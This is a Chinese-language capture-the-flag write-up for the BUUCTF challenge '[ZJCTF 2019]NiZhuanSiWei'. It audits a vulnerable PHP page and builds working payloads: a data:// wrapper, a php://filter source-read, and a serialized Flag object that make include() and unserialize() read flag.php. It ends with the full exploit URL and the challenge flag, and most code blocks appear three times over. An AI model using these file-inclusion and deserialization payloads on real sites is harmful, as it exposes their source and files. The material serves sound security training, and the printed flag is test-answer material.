进入题目链接
直接就是一段代码需要审计
<?php$text = $_GET[\"text\"];$file = $_GET[\"file\"];$password = $_GET[\"password\"];if(isset($text)&&(file_get_contents($text,\'r\')===\"welcome to the zjctf\")){echo \"<br><h1>\".file_get_contents($text,\'r\').\"</h1></br>\";if(preg_match(\"/flag/\",$file)){echo \"Not now!\";exit();}else{include($file); //useless.php$password = unserialize($password);echo $password;}}else{highlight_file(__FILE__);}?><?php $text = $_GET[\"text\"]; $file = $_GET[\"file\"]; $password = $_GET[\"password\"]; if(isset($text)&&(file_get_contents($text,\'r\')===\"welcome to the zjctf\")){ echo \"<br><h1>\".file_get_contents($text,\'r\').\"</h1></br>\"; if(preg_match(\"/flag/\",$file)){ echo \"Not now!\"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; } } else{ highlight_file(__FILE__); } ?><?php $text = $_GET[\"text\"]; $file = $_GET[\"file\"]; $password = $_GET[\"password\"]; if(isset($text)&&(file_get_contents($text,\'r\')===\"welcome to the zjctf\")){ echo \"<br><h1>\".file_get_contents($text,\'r\').\"</h1></br>\"; if(preg_match(\"/flag/\",$file)){ echo \"Not now!\"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; } } else{ highlight_file(__FILE__); } ?>
这道题考点:php伪协议
![图片[1]-[ZJCTF 2019]NiZhuanSiWei – buu刷题笔记-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/04/image-75-1024x376.png)
第一个绕过:(data伪协议写入文件)
if(isset($text)&&(file_get_contents($text,\'r\')===\"welcome to the zjctf\"))if(isset($text)&&(file_get_contents($text,\'r\')===\"welcome to the zjctf\"))if(isset($text)&&(file_get_contents($text,\'r\')===\"welcome to the zjctf\"))
这里需要我们传入text
且其内容为welcome to the zjctf
,然后用data协议
来执行PHP代码
构造payload:text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=构造payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=构造payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
一般情况是需要base64加密的,为了绕过某些过滤
第二个绕过:(php://filter用于读取源码)
$file = $_GET[\"file\"];if(preg_match(\"/flag/\",$file)){echo \"Not now!\";exit();}else{include($file); //useless.php$password = unserialize($password);echo $password;}$file = $_GET[\"file\"]; if(preg_match(\"/flag/\",$file)){ echo \"Not now!\"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; }$file = $_GET[\"file\"]; if(preg_match(\"/flag/\",$file)){ echo \"Not now!\"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; }
filter伪协议
来读源码,同样使用base64编码
构造payload:file=php://filter/read=convert.base64-encode/resource=useless.php构造payload: file=php://filter/read=convert.base64-encode/resource=useless.php构造payload: file=php://filter/read=convert.base64-encode/resource=useless.php
进行base64解码得
<?phpclass Flag{ //flag.phppublic $file;public function __tostring(){if(isset($this->file)){echo file_get_contents($this->file);echo \"<br>\";return (\"U R SO CLOSE !///COME ON PLZ\");}}}?><?php class Flag{ //flag.php public $file; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo \"<br>\"; return (\"U R SO CLOSE !///COME ON PLZ\"); } } } ?><?php class Flag{ //flag.php public $file; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo \"<br>\"; return (\"U R SO CLOSE !///COME ON PLZ\"); } } } ?>
第三个绕过:(反序列化)
进行测试就可以了
<?phpclass Flag{ //flag.phppublic $file=\"flag.php\";public function __tostring(){if(isset($this->file)){echo file_get_contents($this->file);echo \"<br>\";return (\"U R SO CLOSE !///COME ON PLZ\");}}}$a = new Flag();echo serialize($a);?><?php class Flag{ //flag.php public $file=\"flag.php\"; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo \"<br>\"; return (\"U R SO CLOSE !///COME ON PLZ\"); } } } $a = new Flag(); echo serialize($a); ?><?php class Flag{ //flag.php public $file=\"flag.php\"; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo \"<br>\"; return (\"U R SO CLOSE !///COME ON PLZ\"); } } } $a = new Flag(); echo serialize($a); ?>
![图片[2]-[ZJCTF 2019]NiZhuanSiWei – buu刷题笔记-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/04/image-76-1024x240.png)
结果:O:4:\"Flag\":1:{s:4:\"file\";s:8:\"flag.php\";}结果: O:4:\"Flag\":1:{s:4:\"file\";s:8:\"flag.php\";}结果: O:4:\"Flag\":1:{s:4:\"file\";s:8:\"flag.php\";}
构造最终的payload:
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:\"Flag\":1:{s:4:\"file\";s:8:\"flag.php\";}?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:\"Flag\":1:{s:4:\"file\";s:8:\"flag.php\";}?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:\"Flag\":1:{s:4:\"file\";s:8:\"flag.php\";}
![图片[3]-[ZJCTF 2019]NiZhuanSiWei – buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226130240538.png?imageView2/0/format/webp/q/75)
flag在源码里
![图片[4]-[ZJCTF 2019]NiZhuanSiWei – buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226210241513.png?imageView2/0/format/webp/q/75)
所以最终flag为
flag{48f43da1-7c83-4f28-bf71-ddfb42ff3b1e}flag{48f43da1-7c83-4f28-bf71-ddfb42ff3b1e}flag{48f43da1-7c83-4f28-bf71-ddfb42ff3b1e}
THE END
暂无评论内容